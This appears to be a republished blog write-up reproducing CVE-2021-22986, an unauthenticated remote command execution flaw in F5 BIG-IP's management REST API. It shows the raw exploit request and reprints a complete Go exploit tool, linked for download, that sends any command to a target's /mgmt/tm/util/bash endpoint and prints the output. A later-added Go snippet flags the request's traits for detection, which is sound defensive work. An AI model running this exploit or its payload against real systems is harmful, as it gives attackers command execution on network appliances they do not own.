CVE-2021-22986 Reproduction


Reproduction

The request is as follows:

 POST /mgmt/tm/util/bash HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
 Accept: */*
 Connection: close
 Authorization: Basic YWRtaW46
 X-F5-Auth-Token:
 Content-Length: 46
 Content-Type: application/json
 
 {"command": "run", "utilCmdArgs": "-c id"}
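
For detection, the request above has three traits that can be checked together in a proxy or packet capture: the /mgmt/tm/util/bash path, an X-F5-Auth-Token header with no value, and Basic credentials with an empty password. The Go code below is an added example, not part of the original post or the linked tool; the type and function names, the host name and the token value in the samples are constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"strings"
)

// Finding records which traits of the request shown above are present.
type Finding struct {
	BashEndpoint  bool // path is /mgmt/tm/util/bash
	EmptyToken    bool // X-F5-Auth-Token header sent with no value
	EmptyPassword bool // Basic credentials with empty password (YWRtaW46 = "admin:")
}

// Suspicious is true only when all three traits occur in one request.
func (f Finding) Suspicious() bool { return f.BashEndpoint && f.EmptyToken && f.EmptyPassword }

// Inspect parses one raw HTTP request, e.g. taken from a proxy capture.
func Inspect(raw string) (Finding, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return Finding{}, err
	}
	vals, sent := req.Header[http.CanonicalHeaderKey("X-F5-Auth-Token")]
	user, pass, basic := req.BasicAuth()
	return Finding{
		BashEndpoint:  strings.TrimRight(req.URL.Path, "/") == "/mgmt/tm/util/bash",
		EmptyToken:    sent && strings.TrimSpace(strings.Join(vals, "")) == "",
		EmptyPassword: basic && user != "" && pass == "",
	}, nil
}

// rawRequest joins header lines with CRLF and terminates the header block.
func rawRequest(lines ...string) string { return strings.Join(lines, "\r\n") + "\r\n\r\n" }

// Constructed samples: host name and token value are placeholders.
var flaggedSample = rawRequest("POST /mgmt/tm/util/bash HTTP/1.1", "Host: bigip.example.test",
	"Authorization: Basic YWRtaW46", "X-F5-Auth-Token:", "Content-Type: application/json")
var benignSample = rawRequest("POST /mgmt/tm/util/bash HTTP/1.1", "Host: bigip.example.test",
	"X-F5-Auth-Token: CONSTRUCTED-TOKEN", "Content-Type: application/json")

func main() {
	for name, raw := range map[string]string{"flagged": flaggedSample, "benign": benignSample} {
		f, err := Inspect(raw)
		fmt.Printf("%-8s suspicious=%v finding=%+v err=%v\n", name, f.Suspicious(), f, err)
	}
}
```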



Tool

A quick tool written in Go; the code is a bit crude.

Download: https://github.com/yuyan-sec/Poc-Project/tree/main/F5


Relevant code:

package main

import (
	"bytes"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"net/http"
	"regexp"
	"strings"
	"time"
)

func main() {
	var host, cmd string
	flag.StringVar(&host, "u", "", "URL: http://127.0.0.1")
	flag.StringVar(&cmd, "c", "", "CMD: id")
	flag.Parse()
	if host == "" || cmd == "" {
		// Banner shown when a required flag is missing.
		fmt.Println("CVE-2021-22986 Author: @yuyan-sec")
	} else {
		exp(host, cmd)
	}
}

func exp(url, cmd string) {
	// Client that skips TLS certificate verification and gives up after 5 seconds.
	t := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	c := &http.Client{
		Transport: t,
		Timeout:   5 * time.Second,
	}

	url = strings.TrimRight(url, "/")
	url = url + "/mgmt/tm/util/bash"

	// Same JSON body as the request shown above, with cmd in place of "id".
	payload := []byte("{\"command\": \"run\", \"utilCmdArgs\": \"-c " + cmd + "\"}")

	r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload))
	if err != nil {
		return
	}
	r.Header.Set("Content-Type", "application/json")
	r.Header.Set("X-F5-Auth-Token", "")
	r.Header.Set("Authorization", "Basic YWRtaW46")

	resp, err := c.Do(r)
	if err != nil {
		return
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return
	}

	if resp.StatusCode == 200 {
		// Extract the commandResult value from the response body.
		reg := regexp.MustCompile(`"commandResult":"(.*?)\n`)
		commandResult := reg.FindAllStringSubmatch(string(body), -1)
		if len(commandResult) == 0 {
			// No match: report failure instead of indexing an empty slice.
			fmt.Println("fail")
			return
		}
		result := commandResult[0][1]
		result = strings.Replace(result, "context=system_u:system_r:initrc_t:s0", "", -1)
		fmt.Println(result)
	} else {
		fmt.Println("fail")
	}
}


This article was first published on the WeChat official account T9Sec: CVE-2021-22986 Reproduction
